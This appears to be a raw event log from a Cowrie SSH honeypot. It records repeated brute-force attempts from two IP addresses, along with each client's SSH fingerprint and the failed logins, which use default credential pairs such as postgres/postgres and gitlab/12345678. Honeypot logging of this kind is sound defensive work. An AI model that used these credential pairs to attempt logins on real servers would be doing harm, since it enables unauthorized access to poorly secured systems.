{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45728,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a89e3c0ee4c","protocol":"ssh","message":"New connection: 212.227.125.160:45728 (1.2.3.4:22) [session: 0a89e3c0ee4c]","sensor":"my-vps","timestamp":"2025-08-26T11:50:05.399667Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:50:05.400790Z","src_ip":"212.227.125.160","session":"0a89e3c0ee4c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:50:05.450735Z","src_ip":"212.227.125.160","session":"0a89e3c0ee4c"}
{"eventid":"cowrie.login.failed","username":"g","password":"g","message":"login attempt [g/g] failed","sensor":"my-vps","timestamp":"2025-08-26T11:50:05.616213Z","src_ip":"212.227.125.160","session":"0a89e3c0ee4c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:50:06.709295Z","src_ip":"212.227.125.160","session":"0a89e3c0ee4c"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":34198,"dst_ip":"1.2.3.4","dst_port":22,"session":"a20d4fea9954","protocol":"ssh","message":"New connection: 83.168.105.65:34198 (1.2.3.4:22) [session: a20d4fea9954]","sensor":"my-vps","timestamp":"2025-08-26T11:50:08.656809Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:50:08.657626Z","src_ip":"83.168.105.65","session":"a20d4fea9954"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:50:08.697194Z","src_ip":"83.168.105.65","session":"a20d4fea9954"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"12345678","message":"login attempt [gitlab/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T11:50:08.817005Z","src_ip":"83.168.105.65","session":"a20d4fea9954"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:50:09.858647Z","src_ip":"83.168.105.65","session":"a20d4fea9954"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46498,"dst_ip":"1.2.3.4","dst_port":22,"session":"0553dda0e914","protocol":"ssh","message":"New connection: 212.227.125.160:46498 (1.2.3.4:22) [session: 0553dda0e914]","sensor":"my-vps","timestamp":"2025-08-26T11:50:11.610999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:50:11.611985Z","src_ip":"212.227.125.160","session":"0553dda0e914"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:50:11.663647Z","src_ip":"212.227.125.160","session":"0553dda0e914"}
{"eventid":"cowrie.login.failed","username":"sysadmin","password":"sysadmin","message":"login attempt [sysadmin/sysadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:50:11.822192Z","src_ip":"212.227.125.160","session":"0553dda0e914"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:50:12.875694Z","src_ip":"212.227.125.160","session":"0553dda0e914"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47264,"dst_ip":"1.2.3.4","dst_port":22,"session":"cac260b18d28","protocol":"ssh","message":"New connection: 212.227.125.160:47264 (1.2.3.4:22) [session: cac260b18d28]","sensor":"my-vps","timestamp":"2025-08-26T11:50:18.036709Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:50:18.211543Z","src_ip":"212.227.125.160","session":"cac260b18d28"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:50:18.212448Z","src_ip":"212.227.125.160","session":"cac260b18d28"}
{"eventid":"cowrie.login.failed","username":"server","password":"server","message":"login attempt [server/server] failed","sensor":"my-vps","timestamp":"2025-08-26T11:50:18.488017Z","src_ip":"212.227.125.160","session":"cac260b18d28"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:50:19.546686Z","src_ip":"212.227.125.160","session":"cac260b18d28"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48036,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa4745d1c729","protocol":"ssh","message":"New connection: 212.227.125.160:48036 (1.2.3.4:22) [session: fa4745d1c729]","sensor":"my-vps","timestamp":"2025-08-26T11:50:22.861682Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:50:22.863098Z","src_ip":"212.227.125.160","session":"fa4745d1c729"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:50:22.913785Z","src_ip":"212.227.125.160","session":"fa4745d1c729"}
{"eventid":"cowrie.login.failed","username":"asterisk","password":"asterisk","message":"login attempt [asterisk/asterisk] failed","sensor":"my-vps","timestamp":"2025-08-26T11:50:23.129703Z","src_ip":"212.227.125.160","session":"fa4745d1c729"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":45230,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c2d232f6676","protocol":"ssh","message":"New connection: 83.168.105.65:45230 (1.2.3.4:22) [session: 7c2d232f6676]","sensor":"my-vps","timestamp":"2025-08-26T11:50:24.142294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:50:24.143252Z","src_ip":"83.168.105.65","session":"7c2d232f6676"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:50:24.179671Z","src_ip":"83.168.105.65","session":"7c2d232f6676"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:50:24.200501Z","src_ip":"212.227.125.160","session":"fa4745d1c729"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:50:24.332342Z","src_ip":"83.168.105.65","session":"7c2d232f6676"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:50:25.371912Z","src_ip":"83.168.105.65","session":"7c2d232f6676"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48802,"dst_ip":"1.2.3.4","dst_port":22,"session":"2618eaab0c0e","protocol":"ssh","message":"New connection: 212.227.125.160:48802 (1.2.3.4:22) [session: 2618eaab0c0e]","sensor":"my-vps","timestamp":"2025-08-26T11:50:28.494479Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:50:28.495482Z","src_ip":"212.227.125.160","session":"2618eaab0c0e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:50:28.547002Z","src_ip":"212.227.125.160","session":"2618eaab0c0e"}
{"eventid":"cowrie.login.failed","username":"jack","password":"jack","message":"login attempt [jack/jack] failed","sensor":"my-vps","timestamp":"2025-08-26T11:50:28.716969Z","src_ip":"212.227.125.160","session":"2618eaab0c0e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:50:29.808490Z","src_ip":"212.227.125.160","session":"2618eaab0c0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49570,"dst_ip":"1.2.3.4","dst_port":22,"session":"c341692062df","protocol":"ssh","message":"New connection: 212.227.125.160:49570 (1.2.3.4:22) [session: c341692062df]","sensor":"my-vps","timestamp":"2025-08-26T11:50:34.505492Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:50:34.506206Z","src_ip":"212.227.125.160","session":"c341692062df"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:50:34.556827Z","src_ip":"212.227.125.160","session":"c341692062df"}
{"eventid":"cowrie.login.failed","username":"spamfilter","password":"spamfilter","message":"login attempt [spamfilter/spamfilter] failed","sensor":"my-vps","timestamp":"2025-08-26T11:50:35.062611Z","src_ip":"212.227.125.160","session":"c341692062df"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:50:36.116149Z","src_ip":"212.227.125.160","session":"c341692062df"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":54526,"dst_ip":"1.2.3.4","dst_port":22,"session":"193796b98fd9","protocol":"ssh","message":"New connection: 83.168.105.65:54526 (1.2.3.4:22) [session: 193796b98fd9]","sensor":"my-vps","timestamp":"2025-08-26T11:50:39.597990Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:50:39.599288Z","src_ip":"83.168.105.65","session":"193796b98fd9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:50:39.636345Z","src_ip":"83.168.105.65","session":"193796b98fd9"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres","message":"login attempt [postgres/postgres] failed","sensor":"my-vps","timestamp":"2025-08-26T11:50:39.749756Z","src_ip":"83.168.105.65","session":"193796b98fd9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50338,"dst_ip":"1.2.3.4","dst_port":22,"session":"896971a367f6","protocol":"ssh","message":"New connection: 212.227.125.160:50338 (1.2.3.4:22) [session: 896971a367f6]","sensor":"my-vps","timestamp":"2025-08-26T11:50:39.964859Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:50:39.966482Z","src_ip":"212.227.125.160","session":"896971a367f6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:50:40.017371Z","src_ip":"212.227.125.160","session":"896971a367f6"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"daemon","message":"login attempt [daemon/daemon] failed","sensor":"my-vps","timestamp":"2025-08-26T11:50:40.224302Z","src_ip":"212.227.125.160","session":"896971a367f6"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:50:40.788848Z","src_ip":"83.168.105.65","session":"193796b98fd9"}
